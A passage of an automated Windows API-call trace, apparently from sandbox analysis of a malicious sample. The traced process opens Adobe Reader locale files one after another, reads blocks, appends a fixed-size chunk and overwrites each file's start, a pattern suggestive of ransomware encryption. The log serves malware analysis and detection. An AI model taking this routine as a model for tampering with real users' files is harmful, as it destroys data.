0x0 [0083.716] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.716] ReleaseMutex (hMutex=0x168) returned 1 [0083.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.NLD", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.NLD", lpUsedDefaultChar=0x0) returned 11 [0083.716] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9400 [0083.721] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9400 [0083.722] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.722] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.723] CloseHandle (hObject=0x1cc) returned 1 [0083.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\reflow.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\reflow.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0083.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.725] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.725] ReleaseMutex (hMutex=0x168) returned 1 [0083.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.NLD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.NLD", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.NLD", lpUsedDefaultChar=0x0) returned 10 [0083.725] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0083.727] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0083.727] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0083.727] CloseHandle (hObject=0x1cc) returned 1 [0083.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\weblink.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.728] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.728] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7000 [0083.729] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.729] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.729] ReleaseMutex (hMutex=0x168) returned 1 [0083.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.NLD", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.NLD", lpUsedDefaultChar=0x0) returned 11 [0083.729] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.731] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0083.731] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.732] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0083.732] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.733] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.733] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.733] CloseHandle (hObject=0x1cc) returned 1 [0083.733] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\DVA.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\dva.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4800 [0083.734] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.734] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.734] ReleaseMutex (hMutex=0x168) returned 1 [0083.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.POL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0083.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.POL", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.POL", lpUsedDefaultChar=0x0) returned 7 [0083.735] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.737] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3800 [0083.737] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3800 [0083.738] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.738] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.739] CloseHandle (hObject=0x1cc) returned 1 [0083.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\RdLang32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\rdlang32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x14d600 [0083.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.741] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.741] ReleaseMutex (hMutex=0x168) returned 1 [0083.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.POL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.POL", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.POL", lpUsedDefaultChar=0x0) returned 12 [0083.741] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.744] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.745] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14c600 [0083.745] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.747] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14c600 [0083.748] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.748] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.749] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.749] CloseHandle (hObject=0x1cc) returned 1 [0083.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Spelling.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\spelling.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.750] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2800 [0083.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.751] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.751] ReleaseMutex (hMutex=0x168) returned 1 [0083.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.POL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.POL", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.POL", lpUsedDefaultChar=0x0) returned 12 [0083.752] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.932] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0083.932] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0083.933] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.933] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.933] CloseHandle (hObject=0x1cc) returned 1 [0083.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Checkers.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\checkers.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.237] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.237] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1f000 [0084.237] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.238] ReleaseMutex (hMutex=0x168) returned 1 [0084.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.PTB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.PTB", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.PTB", lpUsedDefaultChar=0x0) returned 12 [0084.238] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.275] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e000 [0084.275] ReadFile (in: hFile=0x1cc, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.306] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e000 [0084.306] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.307] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.307] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.308] CloseHandle (hObject=0x1cc) returned 1 [0084.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\pddom.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\pddom.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2e00 [0084.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.309] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.309] ReleaseMutex (hMutex=0x168) returned 1 [0084.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.PTB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0084.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.PTB", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.PTB", lpUsedDefaultChar=0x0) returned 9 [0084.310] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.312] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0084.312] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.313] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0084.313] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.314] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.314] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.322] CloseHandle (hObject=0x1cc) returned 1 [0084.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.355] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.355] SetFilePointer (in: 